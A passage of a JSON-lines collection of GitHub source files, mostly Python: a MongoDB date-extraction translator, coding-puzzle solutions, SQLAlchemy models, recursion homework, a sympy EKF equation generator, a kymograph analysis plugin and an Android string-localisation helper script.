\"$dateFromParts\": {\n \"year\": {\"$year\": f\"${step.column}\"},\n \"month\": {\n \"$switch\": {\n \"branches\": [\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]},\n \"then\": 1,\n },\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 2]},\n \"then\": 4,\n },\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 3]},\n \"then\": 7,\n },\n ],\n \"default\": 10,\n },\n },\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_iso_week(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date a number of days corresponding to (isoDayOfWeek - 1)\n \"$subtract\": [\n f\"${step.column}\",\n {\n \"$multiply\": [\n {\"$subtract\": [{\"$isoDayOfWeek\": f\"${step.column}\"}, 1]},\n 24 * 60 * 60 * 1000,\n ],\n },\n ],\n }\n )\n\n\ndef _extract_previous_day(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date 1 day in milliseconds\n \"$subtract\": [f\"${step.column}\", 24 * 60 * 60 * 1000],\n }\n )\n\n\ndef _extract_first_day_of_previous_year(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\n \"year\": {\"$subtract\": [{\"$year\": f\"${step.column}\"}, 1]},\n \"month\": 1,\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_previous_month(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\n \"year\": {\n \"$cond\": [\n {\"$eq\": [{\"$month\": f\"${step.column}\"}, 1]},\n {\"$subtract\": [{\"$year\": f\"${step.column}\"}, 1]},\n {\"$year\": f\"${step.column}\"},\n ],\n },\n \"month\": {\n \"$cond\": [\n {\"$eq\": [{\"$month\": f\"${step.column}\"}, 1]},\n 12,\n {\"$subtract\": [{\"$month\": f\"${step.column}\"}, 1]},\n ],\n },\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_previous_week(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date a number of days corresponding to (dayOfWeek - 1)\n \"$subtract\": [\n {\"$subtract\": [f\"${step.column}\", 7 * 24 * 60 * 60 * 1000]},\n {\n \"$multiply\": [\n {\"$subtract\": [{\"$dayOfWeek\": f\"${step.column}\"}, 1]},\n 24 * 60 * 60 * 1000,\n ],\n },\n ],\n }\n )\n\n\ndef _extract_first_day_of_previous_quarter(step: DateExtractStep) -> MongoStep:\n return {\n \"$dateFromParts\": {\n \"year\": {\n \"$cond\": [\n {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]},\n {\"$subtract\": [{\"$year\": f\"${step.column}\"}, 1]},\n {\"$year\": f\"${step.column}\"},\n ],\n },\n \"month\": {\n \"$switch\": {\n \"branches\": [\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]},\n \"then\": 10,\n },\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 2]},\n \"then\": 1,\n },\n {\n \"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 3]},\n \"then\": 4,\n },\n ],\n \"default\": 7,\n },\n },\n \"day\": 1,\n },\n }\n\n\ndef _extract_first_day_of_previous_iso_week(step: DateExtractStep) -> MongoStep:\n return _truncate_date_to_day(\n {\n # We subtract to the target date a number of days corresponding to (isoDayOfWeek - 1)\n \"$subtract\": [\n {\"$subtract\": [f\"${step.column}\", 7 * 24 * 60 * 60 * 1000]},\n {\n \"$multiply\": [\n {\"$subtract\": [{\"$isoDayOfWeek\": f\"${step.column}\"}, 1]},\n 24 * 60 * 60 * 1000,\n ],\n },\n ],\n }\n )\n\n\ndef _extract_previous_year(step: DateExtractStep) -> MongoStep:\n return {\n \"$subtract\": [{\"$year\": 
f\"${step.column}\"}, 1],\n }\n\n\ndef _extract_previous_month(step: DateExtractStep) -> MongoStep:\n return {\n \"$cond\": [\n {\"$eq\": [{\"$month\": f\"${step.column}\"}, 1]},\n 12,\n {\"$subtract\": [{\"$month\": f\"${step.column}\"}, 1]},\n ],\n }\n\n\ndef _extract_previous_week(step: DateExtractStep) -> MongoStep:\n return {\n # We subtract to the target date 7 days in milliseconds\n \"$week\": {\"$subtract\": [f\"${step.column}\", 7 * 24 * 60 * 60 * 1000]},\n }\n\n\ndef _extract_previous_quarter(step: DateExtractStep) -> MongoStep:\n return {\n \"$switch\": {\n \"branches\": [\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 1]}, \"then\": 4},\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 2]}, \"then\": 1},\n {\"case\": {\"$lte\": [{\"$divide\": [{\"$month\": f\"${step.column}\"}, 3]}, 3]}, \"then\": 2},\n ],\n \"default\": 3,\n },\n }\n\n\ndef _extract_previous_iso_week(step: DateExtractStep) -> MongoStep:\n return {\n # We subtract to the target date 7 days in milliseconds\n \"$isoWeek\": {\"$subtract\": [f\"${step.column}\", 7 * 24 * 60 * 60 * 1000]},\n }\n\n\n_ADVANCED_DATE_EXTRACT_MAP = {\n \"quarter\": _extract_quarter,\n \"firstDayOfYear\": _extract_first_day_of_year,\n \"firstDayOfMonth\": _extract_first_day_of_month,\n \"firstDayOfWeek\": _extract_first_day_of_week,\n \"firstDayOfQuarter\": _extract_first_day_of_quarter,\n \"firstDayOfIsoWeek\": _extract_first_day_of_iso_week,\n \"previousDay\": _extract_previous_day,\n \"firstDayOfPreviousYear\": _extract_first_day_of_previous_year,\n \"firstDayOfPreviousMonth\": _extract_first_day_of_previous_month,\n \"firstDayOfPreviousWeek\": _extract_first_day_of_previous_week,\n \"firstDayOfPreviousQuarter\": _extract_first_day_of_previous_quarter,\n \"firstDayOfPreviousIsoWeek\": _extract_first_day_of_previous_iso_week,\n \"previousYear\": _extract_previous_year,\n \"previousMonth\": _extract_previous_month,\n \"previousWeek\": _extract_previous_week,\n \"previousQuarter\": _extract_previous_quarter,\n \"previousIsoWeek\": _extract_previous_iso_week,\n}\n\n_DATE_EXTRACT_MAP = {\n \"year\": \"$year\",\n \"month\": \"$month\",\n \"day\": \"$dayOfMonth\",\n \"week\": \"$week\",\n \"dayOfYear\": \"$dayOfYear\",\n \"dayOfWeek\": \"$dayOfWeek\",\n \"isoYear\": \"$isoWeekYear\",\n \"isoWeek\": \"$isoWeek\",\n \"isoDayOfWeek\": \"$isoDayOfWeek\",\n \"hour\": \"$hour\",\n \"minutes\": \"$minute\",\n \"seconds\": \"$second\",\n \"milliseconds\": \"$millisecond\",\n}\n\n\ndef translate_date_extract(step: DateExtractStep) -> list[MongoStep]:\n new_columns = []\n add_fields = {}\n\n date_info: list\n # For retrocompatibility\n if step.operation:\n date_info = [step.operation] if step.operation else step.date_info\n new_columns = [\n step.new_column_name if step.new_column_name else f\"{step.column}_{step.operation}\"\n ]\n else:\n date_info = step.date_info.copy()\n new_columns = step.new_columns.copy()\n\n for i, d in enumerate(date_info):\n if d in _ADVANCED_DATE_EXTRACT_MAP:\n add_fields[new_columns[i]] = _ADVANCED_DATE_EXTRACT_MAP[d](step)\n else:\n add_fields[new_columns[i]] = {\n _DATE_EXTRACT_MAP[d]: f\"${step.column}\",\n }\n\n return [{\"$addFields\": add_fields}]\n","repo_name":"ToucanToco/weaverbird","sub_path":"server/src/weaverbird/backends/mongo_translator/steps/date_extract.py","file_name":"date_extract.py","file_ext":"py","file_size_in_byte":10257,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"60"} 
+{"seq_id":"2520768267","text":"# Problem Id: 97\n# Problem Name: Interleaving String, 交错字符串\n# Problem Url: https://leetcode-cn.com/problems/interleaving-string/\n# Problem Level: Medium\n# Language: Python3\n \nclass Solution:\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n if len(s1) + len(s2) != len(s3):\n return False\n m = len(s1)\n n = len(s2)\n dp = []\n for i in range(m+1):\n dp.append([False]*(n+1))\n dp[0][0] = True \n for i in range(1,m+1):\n dp[i][0] = dp[i-1][0] and s1[i-1] == s3[i-1]\n for j in range(1,n+1):\n dp[0][j] = dp[0][j-1] and s2[j-1] == s3[j-1]\n for i in range(1,m+1):\n for j in range(1,n+1):\n dp[i][j] = (dp[i-1][j] and s1[i-1] == s3[i+j-1]) or (dp[i][j-1] and s2[j-1] == s3[i+j-1])\n return dp[-1][-1]","repo_name":"siru-xiong/leetcode-solutions","sub_path":"solutions/0097-交错字符串.py","file_name":"0097-交错字符串.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29671384900","text":"# return given number in reverse order \n\ndef reverse(num) : \n sum = 0 \n if num == 0 : \n return 0 \n \n if num != 0 : \n rem = num%10 \n return sum*10 + rem + reverse(num//10)\n else : \n return sum\n return sum \n\n\n\nnum = int(input(\"Enter any number : \"))\nrevnum = reverse(num)\nprint(\"reverse number : \",revnum)","repo_name":"JaydeepKachare/Python-Classwork","sub_path":"Recursion/527.py","file_name":"527.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17231167700","text":"import sys\n\nfrom parrthon.lexer import ParrthonLexer\nfrom parrthon.parser import ParrthonParser\nfrom parrthon.errors import ExitParrthon\n\ndef read_file(path: str):\n lexer = ParrthonLexer()\n parser = ParrthonParser()\n\n with open(path, 'r') as f:\n lines = f.read().splitlines()\n \n # Remove empty lines\n lines = list(filter(None, lines))\n\n # Parse each line\n for line in lines:\n try: \n parser.parse(lexer.tokenize(line))\n except EOFError:\n break\n except ExitParrthon:\n return\n\n\nif __name__ == \"__main__\":\n assert len(sys.argv) == 2, \"Ye biscuit eater need a .parr file path\"\n \n path = sys.argv[1]\n\n read_file(path)","repo_name":"ArztKlein/parrthon","sub_path":"parrthon/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38510700596","text":"import sqlalchemy as sq\nfrom sqlalchemy.orm import declarative_base, relationship\n\nBase = declarative_base()\n\n\nclass Publisher(Base):\n __tablename__ = 'publisher'\n\n id = sq.Column(sq.Integer, primary_key=True)\n name = sq.Column(sq.String(length=40), unique=True)\n\n books = relationship('Book', back_populates='publisher')\n\nclass Book(Base):\n __tablename__ = 'book'\n \n id = sq.Column(sq.Integer, primary_key=True)\n title = sq.Column(sq.String(length=40), unique=True)\n id_publisher = sq.Column(sq.Integer, sq.ForeignKey('publisher.id'), nullable=False)\n\n publisher = relationship('Publisher', back_populates='books')\n stock_book = relationship('Stock', back_populates='book_stock')\n\nclass Shop(Base):\n __tablename__ = 'shop'\n\n id = sq.Column(sq.Integer, primary_key=True)\n name = sq.Column(sq.String(length=40), unique=True)\n\n stock_shop = relationship('Stock', back_populates='shop_stock')\n\n\nclass Stock(Base):\n __tablename__ = 'stock'\n\n id = sq.Column(sq.Integer, 
primary_key=True)\n id_book = sq.Column(sq.Integer, sq.ForeignKey('book.id'), nullable=False)\n id_shop = sq.Column(sq.Integer, sq.ForeignKey('shop.id'), nullable=False)\n count = sq.Column(sq.Integer)\n\n book_stock = relationship('Book', back_populates='stock_book')\n shop_stock = relationship('Shop', back_populates='stock_shop')\n sale_stock = relationship('Sale', back_populates='stock_sale')\n\nclass Sale(Base):\n __tablename__ = 'sale'\n\n id = sq.Column(sq.Integer, primary_key=True)\n price = sq.Column(sq.Float, nullable=False)\n date_sale = sq.Column(sq.String, nullable=False)\n id_stock = sq.Column(sq.Integer, sq.ForeignKey('stock.id'), nullable=False)\n count = sq.Column(sq.Integer)\n\n stock_sale = relationship('Stock', back_populates='sale_stock')\n\ndef create_tables(engine):\n Base.metadata.drop_all(engine)\n Base.metadata.create_all(engine)\n\n","repo_name":"SkibaEvgeniy/hw-bd6","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16876943182","text":"import sys\n\ninput = sys.stdin.readline\n\ndef find(a):\n if a!= parent[a]:\n parent[a] = find(parent[a])\n return parent[a]\n\ndef union(a, b):\n a = find(a)\n b = find(b)\n if a=0:\n print(\"YES\")\n","repo_name":"borish3198/Problem_Solving","sub_path":"BOJ/find_union/1976.py","file_name":"1976.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25478067635","text":"\"\"\"exercise 7 week 0\"\"\"\n# Create a list of the cubes of x for x in [0, 10] using:\n# a) a for loop\n# b) a list comprehension\n\n# a)\ncubes = []\nfor x in range(0, 11):\n cubes.append(x * x * x)\n\nprint(cubes)\n\n# b)\ncubes = [x * x * x for x in range(0, 11)]\n\nprint(cubes)\n","repo_name":"NicoloSalimbeni/high_level_programming","sub_path":"exercises/week_0/ex_7.py","file_name":"ex_7.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5409093893","text":"#ДЗ на вторник:\n# 1. Написать рекурсивную функцию, которая определяет, является ли строка палиндромом\n# (одинаково читается в обе стороны: герег, лол, мам, level и тд.)\n#Шаблон:\n\ndef is_palindrome(stroka):\n if len(stroka) < 2:\n return True\n elif stroka[0] != stroka[-1]:\n return False\n else:\n return is_palindrome(stroka[1:-1])\n\nprint(is_palindrome(\"level\"))\n\n\n#2. Написать рекурсивную функцию для подсчета количества элементов в списке.\n\ndef count_elem(my_list):\n if my_list == []:\n return 0\n return 1 + count_elem(my_list[1:])\n\nprint(count_elem(['a','b', 20, 30, 40, 5]))\n\n\n#3. Этот код отсортирует список строк по последнему символу в каждой строке.\n # Здесь использована лямбда-функция в качестве ключа в сортировке.\n# # Измените код так, чтобы сортировка была по второму символу каждой строки\n\nstrings = ['apple', 'banana', 'cherry', 'date']\nsorted_strings = sorted(strings, key=lambda s: s[2])\n# sorted_strings_1 = sorted(strings, key=lambda s: s[1])\nprint(sorted_strings) # Output: ['cherry', 'date', 'apple', 'banana']\n\n\n#4. 
Напишите функцию make_adder(n),\n# которая принимает целое число n и возвращает внутреннюю функцию,\n# которая может прибавлять этот n к любому другому целому числу.\n\ndef make_adder(n):\n def adder(x):\n return x + n\n return adder\n\nadd_1 = make_adder(1)\nadd_2 = make_adder(10)\n\nprint(add_1(4))\nprint(add_2(8))\nprint(make_adder(10)(20))\n\n#5. Напишите функцию counter(), которая возвращает внутреннюю функцию increment(),\n# которая увеличивает счетчик на 1 каждый раз, когда она вызывается.\n\ndef counter():\n count = 0\n def increment():\n nonlocal count\n count += 1\n return count\n return increment\n\nfunc_1 = counter()\n\nprint(func_1())\nprint(func_1())\nprint(func_1())","repo_name":"kotusch/python_dz","sub_path":"Katushonok_Lesson_13.py","file_name":"Katushonok_Lesson_13.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12067355087","text":"from sympy import *\n# Our state is [q, b], where q is quatenion and b are biases\nstate_len = 7\nx = IndexedBase('x', shape=(state_len,))\n# Without an input our state changed only by biases\n# So we repeat our quat\nI4 = Identity(4)\n# and we assume biases stay the same\nI3 = Identity(3)\n# we drop the first column to multiply quaternions with 3-vectors\ndef q2m(q):\n return Matrix([\n [-q.b, -q.c, -q.d],\n [ q.a, -q.d, q.c],\n [ q.d, q.a, -q.b],\n [-q.c, q.b, q.a]])\n\n# Convert indexed base to list\ndef i2l(i, start, stop):\n return [i[j] for j in range(start, stop)]\n\n# Convert indexed base to Matrix\ndef i2m(i):\n s = i.shape\n assert len(s) == 2, \"Works only for 2D case\"\n m = []\n for r in range(s[0]):\n tr = []\n for c in range(s[1]):\n tr.append(i[r, c])\n m.append(tr)\n return Matrix(m)\n\n# no interaction between q and b\nZ3x4 = zeros(3, 4)\n# we assume constant angular speed between measurements\ndt = symbols(\"d_t\")\n# Estimated quaternion\nq = Quaternion(*i2l(x, 0, 4))\n# Estimated bias\nb = Matrix(i2l(x, 4, 6))\n# State transition matrix\nA = Matrix(BlockMatrix([[I4, (-dt / 2.0) * q2m(q)], [Z3x4, I3]]))\n# Measured angular velocity control our attitude\nw = IndexedBase('w', shape=(3,))\nw_m = Matrix(i2l(w, 0, 3))\n# But doesn't influence the bias\nZ3x3 = zeros(3, 3)\n# So our control\nB = BlockMatrix([[q2m(q)], [Z3x3]])\n# State in matrix form\nx_m = Matrix(i2l(x, 0, state_len))\n# Next state\nnx = A * x_m + (dt / 2.0) * Matrix(B) * w_m\n\n# Output our state transition equation\noutput = MatrixSymbol('nx', state_len, 1)\n# Normalize quaternion to account for the limited precision\ndef norm_q(q):\n mag = (q[0]**2 + q[1]**2 + q[2]**2 + q[3]**2)**0.5\n return [q[i] / mag for i in range(4)]\n\nnx[0:4, :] = norm_q(nx[0:4])\n# print(\"// State transition\")\n# print(rust_code(nx, assign_to=output, contract=False))\n\n# We keep it symbolical for code generation, initialize to I7\nP = IndexedBase('P', shape=(state_len, state_len))\nP_m = i2m(P)\nQ = IndexedBase('Q', shape=(state_len, state_len))\nQ_m = i2m(Q)\n\nnP = A * P * A.transpose() + Q\noutput = MatrixSymbol('np', state_len, state_len)\n# print(\"// Error transition\")\n# print(ccode(nP, assign_to=output, contract=False))\n\n# Get homogeneous rotation matrix\ndef q2hrm(q):\n s = q.norm()**-2\n m00 = s * (q.a**2 + q.b**2 - q.c**2 - q.d**2)\n m11 = s * (q.a**2 - q.b**2 + q.c**2 - q.d**2)\n m22 = s * (q.a**2 - q.b**2 - q.c**2 + q.d**2)\n m = q.to_rotation_matrix().transpose()\n m[0, 0] = m00\n m[1, 1] = m11\n m[2, 2] = m22\n return m / s\n\n# Generate Jacobian 
equations\ndef gen_jac(q, r):\n return (q2hrm(q) * Matrix(i2l(r, 0, 3))).jacobian(Matrix([q.a, q.b, q.c, q.d]))\n\n# r = IndexedBase('r', shape=(3,))\n# output = MatrixSymbol('j', 3, 4)\n# print(ccode(gen_jac(q, r), assign_to=output, contract=False))\n\n# Now we have everything to predict accelerometer and magnetometer values\nar = Matrix(i2l(IndexedBase('a_r', shape=(3,)), 0, 3))\nmr = Matrix(i2l(IndexedBase('m_r', shape=(3,)), 0, 3))\nC_a = gen_jac(q, ar)\nC_m = gen_jac(q, mr)\nC = BlockMatrix([[C_a, Z3x3], [C_m, Z3x3]])\noutput = MatrixSymbol('C', 6, 7)\n# Convertion matrix\nprint(ccode(C, assign_to=output, contract=False))\n\ny = BlockMatrix([[q2hrm(q) * ar], [q2hrm(q) * mr]])\noutput = MatrixSymbol('y', 6, 1)\nprint(rust_code(y, assign_to=output, contract=False))\n","repo_name":"copterust/proving-ground","sub_path":"calibrating_ahrs/ekf/gen_ekf.py","file_name":"gen_ekf.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"60"} +{"seq_id":"35521898082","text":"# -*- coding: utf-8 -*-\n# Author: Weichen Liao\n\n'''\n\n10. Regular Expression Matching\n\nGiven an input string (s) and a pattern (p), implement regular expression matching with support for '.' and '*'.\n\n'.' Matches any single character.\n'*' Matches zero or more of the preceding element.\nThe matching should cover the entire input string (not partial).\n\nNote:\n\ns could be empty and contains only lowercase letters a-z.\np could be empty and contains only lowercase letters a-z, and characters like . or *.\nExample 1:\n\nInput:\ns = \"aa\"\np = \"a\"\nOutput: false\nExplanation: \"a\" does not match the entire string \"aa\".\nExample 2:\n\nInput:\ns = \"aa\"\np = \"a*\"\nOutput: true\nExplanation: '*' means zero or more of the preceding element, 'a'. Therefore, by repeating 'a' once, it becomes \"aa\".\nExample 3:\n\nInput:\ns = \"ab\"\np = \".*\"\nOutput: true\nExplanation: \".*\" means \"zero or more (*) of any character (.)\".\nExample 4:\n\nInput:\ns = \"aab\"\np = \"c*a*b\"\nOutput: true\nExplanation: c can be repeated 0 times, a can be repeated 1 time. 
Therefore, it matches \"aab\".\nExample 5:\n\nInput:\ns = \"mississippi\"\np = \"mis*is*p*.\"\nOutput: false\n\n'''\n\nclass Solution:\n def isMatch(s: str, p: str) -> bool:\n ans = False\n indexS, indexP = 0, 0\n curP = ''\n\n # understand the patterns\n patternList = []\n while indexP < len(p):\n if p[indexP] == '*':\n curP += p[indexP]\n patternList.append(curP)\n curP = ''\n\n else:\n if curP != '':\n patternList.append(curP)\n curP = p[indexP]\n\n indexP += 1\n if curP != '':\n patternList.append(curP)\n print('patternList:', patternList)\n\n # compare with the patterns\n indexP = 0\n flagStar = False\n strStar = ''\n while indexS < len(s) and indexP < len(p):\n curP = patternList[indexP]\n if flagStar == True:\n if curP == '.*':\n if s[indexS] == strStar:\n indexS += 1\n continue\n else:\n flagStar = False\n indexS += 1\n indexP += 1\n continue\n else: #curP == 'm*' like that\n if s[indexS] == strStar:\n indexS += 1\n continue\n else:\n flagStar = False\n indexS += 1\n indexP += 1\n continue\n else:\n if curP == '.':\n indexP += 1\n indexS += 1\n elif curP == '.*':\n flagStar = True\n strStar = s[indexS]\n indexS += 1\n continue\n elif '*' in curP:\n flagStar = True\n strStar = s[indexS]\n indexS += 1\n continue\n # the normal characters\n else:\n if p[indexP] == s[indexS]:\n indexP += 1\n indexS += 1\n else:\n return False\n if indexS < len(s) or indexP < len(p):\n return False\n return True\n \n\n\ns = \"misf\"\np = \"mis.*\"\nres = Solution.isMatch(s,p)\nprint(res)\n","repo_name":"weichen-liao/Leetcode","sub_path":"hard_10.py","file_name":"hard_10.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4362608665","text":"#!/usr/bin/python3\nfrom sys import argv\nif __name__ == \"__main__\":\n sum = 0\n b = 1\n a = len(argv) - 1\n while (a > 0):\n d = int(argv[b])\n sum += d\n b += 1\n a -= 1\n\n print(\"{:d}\".format(sum))\n","repo_name":"FisaniG/alx-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29292304624","text":"import copy\n\ndef solution(emergency):\n #return sorted(range(len(emergency)), key=lambda k: emergency[k], reverse=True)\n copy_e = copy.deepcopy(emergency)\n copy_e = sorted(copy_e, reverse=True)\n print(emergency, copy_e)\n for i in range(1, len(emergency)+1):\n emergency[i-1] = copy_e.index(emergency[i-1])+1\n \n return emergency","repo_name":"privacy97/Programmers_Python","sub_path":"프로그래머스/lv0/120835. 
진료 순서 정하기/진료 순서 정하기.py","file_name":"진료 순서 정하기.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17875503557","text":"import numpy as np\nimport scipy.signal\n\nfrom sanpy.user_analysis.baseUserAnalysis import baseUserAnalysis\n\nfrom sanpy.sanpyLogger import get_logger\nlogger = get_logger(__name__)\n\nclass kymUserAnalysis(baseUserAnalysis):\n \"\"\"Create and perform kymograph diameter analysis and add it to the main bAnalysis.\n \n This is called from two place:\n 1) after main bAnalysis detect spikes\n 2) after user analyzes diameter in the Kymograph plugin\n \"\"\"\n def defineUserStats(self):\n \"\"\"Add your user stats here.\"\"\"\n # if self.ba is None or not self.ba.fileLoader.isKymograph:\n # return\n \n # foot\n self.addUserStat(\"Diameter Foot (um)\", \"k_diam_foot\")\n self.addUserStat(\"Diameter Foot Pnt\", \"k_diam_foot_pnt\")\n self.addUserStat(\"Diameter Foot Time (s)\", \"k_diam_foot_sec\")\n # peak\n self.addUserStat(\"Diameter Peak (um)\", \"k_diam_peak\")\n self.addUserStat(\"Diameter Peak Pnt\", \"k_diam_peak_pnt\")\n self.addUserStat(\"Diameter Peak Time (s)\", \"k_diam_peak_sec\")\n # summary\n\n # do both time to peak with in\n self.addUserStat(\"Diameter Time To Peak wrt peak in the Ca sppike(s)\", \"k_diam_time_to_peak_sec\")\n\n self.addUserStat(\"Diameter Amp (um)\", \"k_diam_amp\")\n self.addUserStat(\"Diameter Percent Change (%)\", \"k_diam_percent\")\n\n def run(self):\n if not self.ba.fileLoader.isKymograph:\n return\n if self.ba.kymAnalysis is None:\n return\n if not self.ba.kymAnalysis.hasDiamAnalysis:\n return\n\n logger.info('RUNNING userKyDiamAnalysis')\n \n # get filtered vm for the entire trace\n # filteredVm = self.getFilteredVm()\n\n diameter_um = self.ba.kymAnalysis.getResults('diameter_um')\n diameter_um = np.array(diameter_um)\n\n diameter_um = scipy.signal.medfilt(diameter_um, 3)\n \n lastIdx = self.ba.numSpikes - 1\n\n for spikeIdx, spikeDict in enumerate(self.ba.spikeDict):\n k_diam_foot = float('nan')\n k_diam_foot_pnt = float('nan')\n k_diam_foot_sec = float('nan')\n\n k_diam_peak = float('nan')\n k_diam_peak_pnt = float('nan')\n k_diam_peak_sec = float('nan')\n\n k_diam_time_to_peak_sec = float('nan')\n k_diam_amp = float('nan')\n\n if spikeIdx != lastIdx:\n \n nextThresholdPnt = self.ba.spikeDict[spikeIdx+1]['thresholdPnt']\n thresholdPnt = spikeDict['thresholdPnt']\n \n # baseline of diam before Ca spike\n footStartPnt = thresholdPnt - 12\n if footStartPnt < 0:\n continue\n footStopPnt = thresholdPnt - 2\n footMean = np.mean(diameter_um[footStartPnt:footStopPnt])\n\n k_diam_foot = footMean\n k_diam_foot_pnt = thresholdPnt - 6\n k_diam_foot_sec = self.ba.fileLoader.pnt2Sec_(k_diam_foot_pnt)\n\n # peak of diam before next Ca spike\n diamClip = diameter_um[thresholdPnt:nextThresholdPnt]\n \n k_diam_peak = np.min(diamClip)\n k_diam_amp = k_diam_peak - k_diam_foot\n\n _maxPnt = np.argmin(diamClip)\n k_diam_peak_pnt = _maxPnt + thresholdPnt\n k_diam_peak_sec = self.ba.fileLoader.pnt2Sec_(k_diam_peak_pnt)\n\n k_diam_time_to_peak_sec = k_diam_peak_sec - self.ba.fileLoader.pnt2Sec_(thresholdPnt)\n\n # logger.info(f' {spikeIdx} {k_diam_foot} {k_diam_foot_pnt}')\n\n # assign to underlying bAnalysis\n \n # foot\n logger.info(f'spikeIdx:{spikeIdx} k_diam_foot:{k_diam_foot}')\n self.setSpikeValue(spikeIdx, \"k_diam_foot\", k_diam_foot)\n self.setSpikeValue(spikeIdx, \"k_diam_foot_pnt\", k_diam_foot_pnt)\n self.setSpikeValue(spikeIdx, 
\"k_diam_foot_sec\", k_diam_foot_sec)\n # peak\n self.setSpikeValue(spikeIdx, \"k_diam_peak\", k_diam_peak)\n self.setSpikeValue(spikeIdx, \"k_diam_peak_pnt\", k_diam_peak_pnt)\n self.setSpikeValue(spikeIdx, \"k_diam_peak_sec\", k_diam_peak_sec)\n # summary\n self.setSpikeValue(spikeIdx, \"k_diam_time_to_peak_sec\", k_diam_time_to_peak_sec)\n self.setSpikeValue(spikeIdx, \"k_diam_amp\", k_diam_amp)\n\n # percent change in diameter from foot to peak\n k_diam_percent = round( k_diam_peak / k_diam_foot * 100, 3)\n self.setSpikeValue(spikeIdx, \"k_diam_percent\", k_diam_percent)\n","repo_name":"cudmore/SanPy","sub_path":"sanpy/user_analysis/userKymDiamAnalysis.py","file_name":"userKymDiamAnalysis.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"12785767843","text":"''' This program gets as input a file with strings to create and converts them\n to the correct format.\n For example, if input is:\n \"Please Allow Permission\"\n Location permission needed to use Bluetooth!\n\n The output will be:\n \n Please Allow Permission\n Location permission needed to use Bluetooth!\n \n The program will also go over all java files and replace the string with 'getApplicationContext().getString(R.string.%s)'\n'''\n\nimport sys\nimport os\n\ndef AddImport(file_name):\n import_str = \"import static com.eveningoutpost.dexdrip.xdrip.gs;\\n\"\n with open(file_name) as f:\n lines = f.readlines()\n \n # The code below assumes that imports have already been sorted.\n replaced = False\n with open(file_name, \"w\") as f:\n for line in lines:\n if import_str == line:\n continue;\n if import_str > line or line.startswith(\"package\") or replaced:\n f.write(line)\n continue\n \n f.write(import_str)\n replaced = True\n f.write(line)\n \n \n\ndef ReplaceString(file_name, id, string):\n content = open(file_name).read()\n full_string = '\"%s\"' %string\n new_string = 'gs(R.string.%s)' % id\n print('replacing ', full_string, new_string)\n if full_string in content:\n print('yeeeeeeeee')\n content = content.replace(full_string, new_string)\n file = open(file_name , \"w\")\n file.write(content)\n file.close()\n\ndef FileContainsString(file, string):\n #print(file)\n full_string = '\"%s\"' %string\n if full_string in open(file).read():\n return True\n return False\n\ndef FindFileContaingString(id, string):\n arr = []\n for d,r,f in os.walk(\"..\\\\..\\\\\"):\n for file in f:\n if file.endswith(\"java\") and \"generated\" not in file and not \"PebbleDisplay\" in file :\n arr.append(os.path.join(d,file))\n \n for file in arr:\n if file.startswith(\"..\\\\..\\\\wear\"):\n continue\n if not FileContainsString(file, string): \n continue\n print(file)\n ReplaceString(file, id, string)\n AddImport(file)\n\n\ndef ReadFile(file_name):\n with open(file_name) as f:\n content = f.readlines()\n # you may also want to remove whitespace characters like `\\n` at the end of each line\n content = [x.strip() for x in content] \n for line in content:\n if line.strip() == '':\n continue\n if 